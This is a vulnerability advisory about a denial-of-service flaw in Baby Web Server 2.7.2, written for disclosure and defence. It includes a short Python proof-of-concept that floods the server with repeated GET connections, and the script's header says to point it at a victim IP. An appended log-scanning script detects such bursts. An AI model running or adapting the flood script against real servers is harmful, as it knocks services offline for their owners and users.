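Vulnerability cause
Failure to handle exceptional conditions
Affected systems
Pablo Software Solutions Baby Web Server 2.7.2
Unaffected systems
Impact
A remote attacker can exploit this vulnerability to cause a denial of service on the system.
Attack prerequisites
The attacker must be able to access Baby Web Server.
Vulnerability details
Pablo Software Solutions Baby Web Server is a web server program.
Baby Web Server does not correctly handle user-submitted GET requests, so a remote attacker can exploit the vulnerability to cause a denial of service on the system.
Test method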
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    conn = s.connect(("127.0.0.1",80))
    for i in range (1,1100):
        request = "GET /some.txt HTTP/1.1 \n\n"
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request)
        print i
except:
    print "Oh! Some Problem Occured Check Server is Running or Not"
Vendor solution
No solution is currently available:
http://www.pablosoftwaresolutions.com/html/baby_web_server.html
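With no vendor fix available, detection has to come from whatever sits in front of the server. The following is an added example, not part of the original advisory: it flags a source that sends a burst of GET requests like the one the test script produces. The log format (`<epoch_seconds> <src_ip> <request line>`), the thresholds, and the sample addresses are assumptions.

```python
from collections import defaultdict, deque

# Assumed thresholds (not from the advisory); tune to the server's normal load.
WINDOW_SECONDS = 10
MAX_REQUESTS_PER_WINDOW = 100


def parse_line(line):
    """Parse '<epoch_seconds> <src_ip> <request line>'; return None if malformed."""
    parts = line.split(None, 2)
    if len(parts) < 3:
        return None
    try:
        ts = float(parts[0])
    except ValueError:
        return None
    return ts, parts[1], parts[2]


def find_flooding_sources(lines, window=WINDOW_SECONDS, limit=MAX_REQUESTS_PER_WINDOW):
    """Return {src_ip: peak request count in a sliding window} for sources over the limit."""
    recent = defaultdict(deque)  # src_ip -> timestamps inside the current window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip malformed lines instead of aborting the scan
        ts, src, _request = parsed
        q = recent[src]
        q.append(ts)
        # Drop timestamps that fell out of the window ending at ts.
        while q and q[0] <= ts - window:
            q.popleft()
        if len(q) > limit:
            peaks[src] = max(peaks.get(src, 0), len(q))
    return peaks


def build_sample_log():
    """Constructed sample: one source sending 1099 GETs in about 2 s, plus one normal client."""
    burst = ["%.3f 192.0.2.10 GET /some.txt HTTP/1.1" % (1000 + i * 0.002) for i in range(1099)]
    normal = ["%.3f 198.51.100.7 GET /index.html HTTP/1.1" % (1000 + i * 5) for i in range(20)]
    lines = sorted(burst + normal, key=lambda l: float(l.split()[0]))
    lines.insert(5, "malformed line")  # constructed bad entry to exercise the parser
    return lines


if __name__ == "__main__":
    for src, peak in find_flooding_sources(build_sample_log()).items():
        print("%s exceeded limit: %d requests within %d s" % (src, peak, WINDOW_SECONDS))
```

Feed it a log from a reverse proxy or firewall in front of the server, since the affected server may stop logging once it becomes unresponsive.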
Vulnerability reported by
Asheesh Kumar Mani Tripathi